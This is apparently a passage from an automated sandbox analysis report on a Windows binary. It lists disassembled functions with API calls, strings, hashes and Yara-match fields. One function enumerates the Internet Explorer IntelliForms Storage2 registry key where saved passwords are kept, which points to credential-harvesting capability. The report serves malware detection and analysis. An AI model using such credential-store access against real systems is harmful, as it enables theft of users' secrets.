                                                  • Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
                                                  • Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                  • Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441FDC, Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memchrmemset
                                                  • String ID: G"D$G"D
                                                  • API String ID: 1581201632-2001841848
                                                  • Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                  • Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
                                                  • Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                  • Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407890, Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemMetrics.USER32 ref: 004078A9
                                                  • GetSystemMetrics.USER32 ref: 004078AF
                                                  • GetDC.USER32(00000000), ref: 004078BC
                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
                                                  • ReleaseDC.USER32 ref: 004078DB
                                                  • GetWindowRect.USER32 ref: 004078EE
                                                  • GetParent.USER32(?), ref: 004078F3
                                                  • GetWindowRect.USER32 ref: 00407910
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                  • String ID:
                                                  • API String ID: 2163313125-0
                                                  • Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                  • Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
                                                  • Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                  • Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040684F, Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 96stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00406878
                                                  • memset.MSVCRT ref: 0040688C
                                                  • strcpy.MSVCRT(?), ref: 004068A6
                                                  • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
                                                  • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
                                                  • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
                                                  • wcscpy.MSVCRT ref: 00406921
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID: Rp@
                                                  • API String ID: 4248099071-3382320042
                                                  • Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                  • Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
                                                  • Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                  • Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402B99, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$wcslen
                                                  • String ID:
                                                  • API String ID: 3592753638-3916222277
                                                  • Opcode ID: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                  • Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
                                                  • Opcode Fuzzy Hash: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                  • Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408C67, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                  • memset.MSVCRT ref: 00408CAF
                                                    • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                  • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,74B5F560), ref: 00408D7D
                                                    • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                    • Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
                                                    • Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153
                                                  • _snwprintf.MSVCRT ref: 00408D49
                                                    • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                    • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                  • API String ID: 2804212203-2982631422
                                                  • Opcode ID: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                  • Instruction ID: ce292a4a65043f2a6a20625204029b960355a9169e5f8c073e361fa6e4a76ec5
                                                  • Opcode Fuzzy Hash: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                  • Instruction Fuzzy Hash: 1E313E72D00219AADF50EFA5DD85ADEB7B8AF04354F50017FA508B21C1DE78AE458F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A818, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadMenuW.USER32 ref: 0040A83F
                                                    • Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
                                                    • Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
                                                    • Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
                                                    • Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1
                                                  • DestroyMenu.USER32(00000000), ref: 0040A85D
                                                  • CreateDialogParamW.USER32 ref: 0040A8AB
                                                  • memset.MSVCRT ref: 0040A8C7
                                                  • GetWindowTextW.USER32 ref: 0040A8DC
                                                  • EnumChildWindows.USER32 ref: 0040A907
                                                  • DestroyWindow.USER32(00000000), ref: 0040A90E
                                                    • Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                  • String ID: caption
                                                  • API String ID: 1928666178-4135340389
                                                  • Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                  • Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
                                                  • Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                  • Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407CFE, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                  • String ID: %s (%s)$G@
                                                  • API String ID: 3979103747-4021399728
                                                  • Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                  • Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
                                                  • Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                  • Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004070BF, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
                                                  • wcslen.MSVCRT ref: 0040710F
                                                  • wcscpy.MSVCRT ref: 0040711F
                                                  • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
                                                  • wcscpy.MSVCRT ref: 00407139
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                  • String ID: Unknown Error$netmsg.dll
                                                  • API String ID: 2767993716-572158859
                                                  • Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                  • Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
                                                  • Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                  • Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A97E, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407548: GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                  • wcscpy.MSVCRT ref: 0040A998
                                                  • wcscpy.MSVCRT ref: 0040A9A8
                                                  • GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9
                                                    • Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                  • API String ID: 3176057301-2039793938
                                                  • Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                  • Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
                                                  • Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                  • Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0042CD7E, Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • out of memory, xrefs: 0042CFEC
                                                  • cannot ATTACH database within transaction, xrefs: 0042CDED
                                                  • attached databases must use the same text encoding as main database, xrefs: 0042CEF6
                                                  • database %s is already in use, xrefs: 0042CE4F
                                                  • unable to open database: %s, xrefs: 0042CFD5
                                                  • too many attached databases - max %d, xrefs: 0042CDD7
                                                  • database is already attached, xrefs: 0042CEA8
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  • Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                  • Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
                                                  • Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                  • Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AFDA, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                    • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B01A
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B036
                                                  • memcpy.MSVCRT ref: 0040B05B
                                                  • memcpy.MSVCRT ref: 0040B06F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B134
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  • Opcode ID: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                  • Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
                                                  • Opcode Fuzzy Hash: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                  • Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004150B6, Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
                                                  • Sleep.KERNEL32(00000001), ref: 00415118
                                                  • GetLastError.KERNEL32 ref: 0041512A
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  • Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                  • Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
                                                  • Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                  • Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415D4D, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
                                                  • GetLastError.KERNEL32 ref: 00415D8B
                                                  • Sleep.KERNEL32(00000064), ref: 00415DA0
                                                  • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
                                                  • GetLastError.KERNEL32 ref: 00415DBD
                                                  • Sleep.KERNEL32(00000064), ref: 00415DD2
                                                  • free.MSVCRT(00000000), ref: 00415DDB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                  • String ID:
                                                  • API String ID: 2802642348-0
                                                  • Opcode ID: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                  • Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
                                                  • Opcode Fuzzy Hash: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                  • Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004124C0, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                  • Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
                                                  • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                  • Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409657, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                    • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                    • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                    • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                  • memset.MSVCRT ref: 004096C7
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                  • _wcsupr.MSVCRT ref: 0040970F
                                                    • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                    • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                    • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                  • memset.MSVCRT ref: 0040975E
                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796
                                                  Strings
                                                  • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                  • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                  • API String ID: 4131475296-680441574
                                                  • Opcode ID: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                  • Instruction ID: ced938f56f23152dc4036b8c9c372f29a7907612beabbfd18841790b2154e098
                                                  • Opcode Fuzzy Hash: 4edf4f35556499e99a9905e10d8b542405bf2b72c6e8e1cec08b7677914b6bc8
                                                  • Instruction Fuzzy Hash: F84118B6D4011DABCB10EF99DD85AEFB7BCAF18304F1040AAB504F2191D7749B458BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409FF5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                  • wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 0040A4E7: memset.MSVCRT ref: 0040A4FA
                                                    • Part of subcall function 0040A4E7: _itow.MSVCRT ref: 0040A508
                                                  • wcslen.MSVCRT ref: 0040A094
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                  • LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                  • memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409F8D
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FAB
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FC9
                                                    • Part of subcall function 00409F53: ??2@YAPAXI@Z.MSVCRT ref: 00409FE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  • Opcode ID: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                  • Instruction ID: f88dad89c8a087f2027bd78e20ebd55682c2f8a720c3c381d0e8595ecd4ac891
                                                  • Opcode Fuzzy Hash: 87213f91dec3db501add7610991c2df7427240ace99253c04b166c5a9059b18a
                                                  • Instruction Fuzzy Hash: 84419A792003059BD7149F18EC91F323365F76430AB99053AE802A73B2DB79EC22CB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A759, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  • Opcode ID: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                  • Instruction ID: 9d6a1000cc6d846fb7caa7b95204278ebeb8f13d5a9664e287c5e204bace7976
                                                  • Opcode Fuzzy Hash: 690b26e669973beaba76962047fb40553a53b69d8850747cc34062e580a6b82a
                                                  • Instruction Fuzzy Hash: E21177325002197AEB24EB91DD4AE9F77BCEF04750F4040B6F508E1192E7745A51CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00419008, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  • Opcode ID: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                  • Instruction ID: 551b55634523189e5c53bd135c739114fe40c1c2f7e89174430398bb56853e76
                                                  • Opcode Fuzzy Hash: 3fb32538101a96232d471ca328e00ad1292916094483904f8e7d4fc59e84f921
                                                  • Instruction Fuzzy Hash: 54A1DEB1A00606BFDB14CFA4C8517DEBBB0BF04314F14856EE468D7381D778AA95CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404D3C, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404DE0
                                                  • GetDlgItem.USER32 ref: 00404DF3
                                                  • GetDlgItem.USER32 ref: 00404E08
                                                  • GetDlgItem.USER32 ref: 00404E20
                                                  • EndDialog.USER32(?,00000002), ref: 00404E3C
                                                  • EndDialog.USER32(?,00000001), ref: 00404E51
                                                    • Part of subcall function 00404AFB: GetDlgItem.USER32 ref: 00404B08
                                                    • Part of subcall function 00404AFB: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404B1D
                                                  • SendDlgItemMessageW.USER32 ref: 00404E69
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00404F7A
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  • Opcode ID: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                  • Instruction ID: 9cc36a3a9081561078e880a2f522ad53539937229c5c78969c314d16862aa257
